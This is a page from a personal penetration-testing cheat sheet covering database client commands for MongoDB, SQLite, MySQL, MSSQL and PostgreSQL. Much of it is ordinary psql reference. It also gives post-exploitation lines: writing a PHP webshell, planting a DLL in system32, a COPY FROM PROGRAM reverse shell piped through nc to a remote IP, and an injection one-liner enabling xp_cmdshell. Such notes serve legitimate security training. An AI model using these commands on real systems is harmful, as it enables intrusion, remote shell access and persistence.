🎃
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page
  • Mongo DB
  • sqlite3
  • MySQL
  • MSSQL
  • Oneliner for Enabling xp_cmdshell and executing commands
  • Postgresql

Was this helpful?

  1. Web Pentest
  2. Server Site Attacks
  3. SQL

SQL Database Uses

Mongo DB

mongo --host localhost --port 27017

show dbs;

use backup;

show collections;
user

db.user.find() 

sqlite3

.tables
.schema table_name
SELECT * FROM table_name;
.exit

MySQL

show databases;
use database_name;
show tables;
select * from table_name;
system whoami
select load_file('C:\\\\Users\\Administrator\\Desktop\\proof.txt');
select '<?php phpinfo() ?>' into outfile 'C:\\\\windows\\www\\webshell.php';
select load_file('C:\\\\programdata\\privesc\\phoneinfo.dll') into dumpfile 'C:\\\\Windows\\system32\\phoneinfo.dll';
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';select * from cmd_exec;
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.232 443 >/tmp/f';select * from cmd_exec;

MSSQL

Select version

SELECT @@version;

Show all databases

SELECT name FROM sys.databases;

master, tempdb, model, and msdb are default databases.

Selecting database and showing available tables

SELECT * FROM offsec.information_schema.tables;

Selecting table and showing all columns

select * from offsec.dbo.users;

Oneliner for Enabling xp_cmdshell and executing commands

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'whoami'--

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'timeout /t 5'--

Postgresql


psql -U postgres  -h 10.4.216.215 -p 5432

#List avaliable databases
\l

#connect to database
\c confluence

#select everything from default user table
select * from cwd_user;

Reference : https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlaying queries of the \ commands (cool for learning!)

  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)

Most \d commands support additional param of __schema__.name__ and accept wildcards like *.*

  • \?: Show help (list of available commands with an explanation)

  • \q: Quit/Exit

  • \c __database__: Connect to a database

  • \d __table__: Show table definition (columns, etc.) including triggers

  • \d+ __table__: More detailed table definition including description and physical disk size

  • \l: List databases

  • \dy: List events

  • \df: List functions

  • \di: List indexes

  • \dn: List schemas

  • \dt *.*: List tables from all schemas (if *.* is omitted will only show SEARCH_PATH ones)

  • \dT+: List all data types

  • \dv: List views

  • \dx: List all extensions installed

  • \df+ __function__ : Show function SQL code.

  • \x: Pretty-format query results instead of the not-so-useful ASCII tables

  • \copy (SELECT * FROM __table_name__) TO 'file_path_and_name.csv' WITH CSV: Export a table as CSV

  • \des+: List all foreign servers

  • \dE[S+]: List all foreign tables

  • \! __bash_command__: execute __bash_command__ (e.g. \! ls)

PreviousPSG SQLNextSQL Injection

Last updated 1 year ago

Was this helpful?